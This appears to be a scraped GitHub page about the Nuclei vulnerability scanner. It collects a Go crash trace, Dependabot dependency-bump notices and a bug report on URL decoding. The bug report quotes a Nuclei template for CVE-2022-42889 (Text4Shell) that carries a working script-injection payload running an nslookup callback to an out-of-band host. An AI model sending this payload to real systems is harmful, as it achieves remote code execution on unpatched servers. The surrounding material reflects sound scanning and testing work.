st(0xc003912480, {0xc0066ef6e0, 0x25}, 0xc0190508c0, 0x0, 0x0, 0xc0106ebc70, 0x4
0da54)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/nuclei/[email protected]
/pkg/protocols/http/request.go:426 +0xec9
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).ExecuteWithR
esults.func1({0xc002fa3e60, 0x60}, 0x16570f0, 0x486f9e7b7)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/nuclei/[email protected]
/pkg/protocols/http/request.go:271 +0x3cf
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).ExecuteWithR
esults(0xc003912480, {0xc0066ef6e0, 0x25}, 0xc01a1cf680, 0xc01a1cf6b0, 0xc01a1cf
6e0)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/nuclei/[email protected]
/pkg/protocols/http/request.go:324 +0x289
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer.(*Executer).
Execute(0xc001b2d380, {0xc0066ef6e0, 0x25})
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/nuclei/[email protected]
/pkg/protocols/common/executer/executer.go:68 +0x1ae
github.com/projectdiscovery/nuclei/v2/pkg/core.(*Engine).executeModelWithInput.f
unc2.1(0x6e34ca, 0x0, {0xc0066ef6e0, 0xc01651f080})
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/nuclei/[email protected]
/pkg/core/execute.go:142 +0x12b
created by github.com/projectdiscovery/nuclei/v2/pkg/core.(*Engine).executeModel
WithInput.func2
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/nuclei/[email protected]
/pkg/core/execute.go:129 +0x6d0

goroutine 83157 [select]:
net/http.(*Transport).getConn(0xc00007edc0, 0xc001d56980, {{}, 0x0, {0xc00c572a8
0, 0x5

chore(deps): bump github.com/projectdiscovery/wappalyzergo from 0.0.76 to 0.0.77 in /v2
Bumps github.com/projectdiscovery/wappalyzergo from 0.0.76 to 0.0.77.

Release notes

Sourced from github.com/projectdiscovery/wappalyzergo's releases.

Release v0.0.77

0.0.77 (2023-01-08)

Commits

c06e7bc Weekly fingerprints update [Sun Jan 8 00:23:37 UTC 2023] :robot:

See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
chore(deps): bump golang.org/x/oauth2 from 0.3.0 to 0.4.0 in /v2
Bumps golang.org/x/oauth2 from 0.3.0 to 0.4.0.

Commits

34ffb07 go.mod: update golang.org/x dependencies

See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
chore(deps): bump golang.org/x/net from 0.4.0 to 0.5.0 in /v2
Bumps golang.org/x/net from 0.4.0 to 0.5.0.

Commits

8e0e7d8 go.mod: update golang.org/x dependencies

7805fdc http2: rewrite inbound flow control tracking

2aa8215 nettest: use RoutedInterface for probing network stack capability

ad92d3d websocket: don't recommend Gorilla

e1ec361 http2: fix race in TestCanonicalHeaderCacheGrowth

See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
chore(deps): bump github.com/go-git/go-git/v5 from 5.5.1 to 5.5.2 in /v2
Bumps github.com/go-git/go-git/v5 from 5.5.1 to 5.5.2.

Release notes

Sourced from github.com/go-git/go-git/v5's releases.

v5.5.2

What's Changed

*: update go-billy v5.4.0, removes data races. Fixes #629 by @mcuadros in go-git/go-git#653

Worktree: Add, fix add removed files. Fixes #223 by @tfujiwar in go-git/go-git#652

Full Changelog: https://github.com/go-git/go-git/compare/v5.5.1...v5.5.2

Commits

5dabd83 Worktree: Add, fix add removed files. Fixes #223 (#652)

6839cd5 Merge pull request #653 from go-git/billy

0162fb1 go.mod: update go-billy v5.4.0, removes races

See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
chore(deps): bump golang.org/x/text from 0.5.0 to 0.6.0 in /v2
Bumps golang.org/x/text from 0.5.0 to 0.6.0.

Commits

ec5565b README.md: update documentation of module versioning

See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

2.8.6 decoded automatically

Nuclei version:

2.8.6

Current Behavior:

In 2.8.6，the %7b、%7d in yaml file will be decoded automatically

Expected Behavior:

the %7b、%7d in yaml file will not be decoded automatically

Steps To Reproduce:

For example，CVE-2022-42889 the docker https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git my yaml file:

id: CVE-2022-42889

info:
  name: Apache Text4shell
  author: f0ng
  severity: critical

requests:
  - raw:
      - |
        GET /text4shell/attack?search=$%7bscript:javascript:java.lang.Runtime.getRuntime().exec('nslookup%20{{Host}}.{{Port}}.getparam.{{interactsh-url}}')%7d HTTP/1.1
        Host: {{Hostname}}
        
    # unsafe: true
    stop-at-first-match: true
    # matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"
          - '{{Host}}.{{Port}}'

in 2.8.5，it works normally

but in 2.8.6，error

the same yaml file，in the different versions, the %7b and %7d are different

Nuclei is a fast tool for configurable targeted vulnerability scanning based on templates offering massive extensibility and ease of use.

Fast and customisable vulnerability scanner based on simple YAML based DSL.

How it works

Install Nuclei

Download Templates

Running Nuclei

For Security Engineers

For Developers and Organisations

Resources

Credits

License

Owner

ProjectDiscovery

Comments

[issue] runtime error

Nuclei Crashes on a huge list of urls

Nuclei version:

Current Behavior:

Expected Behavior:

Steps To Reproduce:

Anything else:

signal SIGSEGV: segmentation violation code=0x1 addr=0x28 pc=0x1b6c1d6

[issue] panic: runtime error: invalid memory address or nil pointer dereference

Nuclei stops to query additional paths when first path/URL is not reachable in case of ports

[bug] An error occurs when running nuclei with multiple instances

Reporting to Github issues fails if the issue-label field is not set

Headless Browsing Login on Websites not Working

[issue] Could not initialize interactsh client when running nuclei

Enumeration progressbar

progress bar library

enumeration support

stdout/stderr output

-no-progressbar flag proposal

refactoring

Loading thousands of urls in list file will lock the executing threads

chore(deps): bump github.com/projectdiscovery/wappalyzergo from 0.0.76 to 0.0.77 in /v2

Release v0.0.77

0.0.77 (2023-01-08)

chore(deps): bump golang.org/x/oauth2 from 0.3.0 to 0.4.0 in /v2

chore(deps): bump golang.org/x/net from 0.4.0 to 0.5.0 in /v2

chore(deps): bump github.com/go-git/go-git/v5 from 5.5.1 to 5.5.2 in /v2

v5.5.2

What's Changed

chore(deps): bump golang.org/x/text from 0.5.0 to 0.6.0 in /v2

2.8.6 decoded automatically

Nuclei version:

Current Behavior:

Expected Behavior:

Steps To Reproduce:

Anything else:

Related tags

The dynamic infrastructure framework for everybody! Distribute the workload of many different scanning tools with ease, including nmap, ffuf, masscan, nuclei, meg and many more!

Pointer was developed for massive hunting and mapping Cobalt Strike servers exposed on the internet.

Govuln - How to patch a vulnerability indirectly lifted into a Go Lang application in a manner which satsfies Twistlock scanning

A source code analyzer built for surfacing features of interest and other characteristics to answer the question 'What's in the code?' quickly using static analysis with a json based rules engine. Ideal for scanning components before use or detecting feature level changes.

Naabu - a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner

🌘🦊 DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang

A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855).

ARP spoofing tool based on go language, supports LAN host scanning, ARP poisoning, man-in-the-middle attack, sensitive information sniffing, HTTP packet sniffing

A fast tool to scan CRLF vulnerability written in Go

EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptography methods, key files and more.

Portmantool - Port scanning and monitoring tool

A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 and CVE-2021-41157.

Akuma Scan comes with the purpose of scanning/detecting WAF (Web Application Firewall) on a certain website. Made to be easy, accurate and agile.

Proof-of-Concept tool for CVE-2021-29156, an LDAP injection vulnerability in ForgeRock OpenAM v13.0.0.

A tool for checking log4shell vulnerability mitigations

Tool to check whether one of your applications is affected by a vulnerability in log4j: CVE-2021-44228

log4jshell vulnerability checker tool

Proto-find is a tool for researchers that lets you find client side prototype pollution vulnerability.

Gryffin is a large scale web security scanning platform.

`-no-progressbar` flag proposal